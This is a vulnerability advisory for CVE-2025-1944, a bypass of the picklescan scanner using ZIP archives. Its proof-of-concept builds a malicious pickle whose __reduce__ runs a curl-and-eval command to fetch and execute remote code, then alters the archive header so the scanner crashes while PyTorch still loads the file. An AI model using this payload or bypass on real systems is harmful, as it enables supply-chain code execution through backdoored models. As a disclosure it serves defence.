CVE-2025-1944
Summary
picklescan before 0.0.23 is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in the ZIP header while keeping the original filename in the directory listing, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch's more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.
Severity rating & weakness enumeration
Rating: Medium - 5.3
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:L/SC:N/SI:L/SA:L
CWE-358: Improperly Implemented Security Check for Standard
Description
Python's built-in zipfile module performs strict integrity checks when extracting ZIP files. If a filename stored in the ZIP header does not match the filename in the directory listing, zipfile.ZipFile.open() raises a BadZipFile error. PickleScan relies on zipfile to extract and inspect the contents of PyTorch model archives, making it susceptible to this manipulation.
PyTorch, on the other hand, has a more tolerant ZIP handling mechanism that ignores these discrepancies, allowing the model to load even when PickleScan fails. An attacker can exploit this behavior to embed a malicious pickle file inside a model archive, which PyTorch will load, while preventing PickleScan from scanning the archive.
Proof-of-Concept (PoC)
The following example demonstrates how a crafted ZIP file could bypass Picklescan's security scan but still be honored by PyTorch to load malicious model(s):
import os
import torch
class RemoteCodeExecution:
def __reduce__(self):
return os.system, (f"eval \"$(curl -s http://localhost:8080)\"",)
model = RemoteCodeExecution()
file = "does_not_scan_but_opens_in_torch.pth"
torch.save(model, file)
# modify the header to cause the zip file to raise execution in picklescan
with open(file, "rb") as f:
data = f.read()
# Replace only the first occurrence of "data.pkl" with "datap.kl"
modified_data = data.replace(b"data.pkl", b"datap.kl", 1)
# Write back the modified content
with open(file, "wb") as f:
f.write(modified_data)
# Load the infected model
torch.load(file)
Impact
-
Who is impacted? Any organization or individual using PickleScan to detect malicious pickle files in PyTorch models.
-
What is the impact? Attackers can embed malicious payloads inside PyTorch model archives while preventing PickleScan from scanning them.
-
Potential Exploits: This technique can be used in supply chain attacks to distribute backdoored models via platforms like Hugging Face.
Mitigations
-
Use a More Tolerant ZIP Parser: PickleScan should handle minor ZIP header inconsistencies more gracefully instead of failing outright.
-
Detect Malformed ZIPs: Instead of crashing, PickleScan should log warnings and attempt to extract valid files.
Note: picklescan version 0.0.23 contains a fix for this issue and can be upgraded to.
Credits
Trevor Madge (@madgetr) of Sonatype
Latest CVE Disclosures
CVE-2025-12183
org.lz4:lz4-java - Out-of-Bounds Memory Access
CVE-2025-1945
Pickescan - Bypass Malicious Pickle Detection inside PyTorch Models via ZIP File Flag Bits
CVE-2025-1944
Picklescan - Security Scanning Bypass via Non-Standard File Extensions
CVE-2025-1889
Picklescan - Security Scanning Bypass via Non-Standard File Extensions
CVE-2025-1716
Picklescan - Security Scanning Bypass Via 'Pip Main'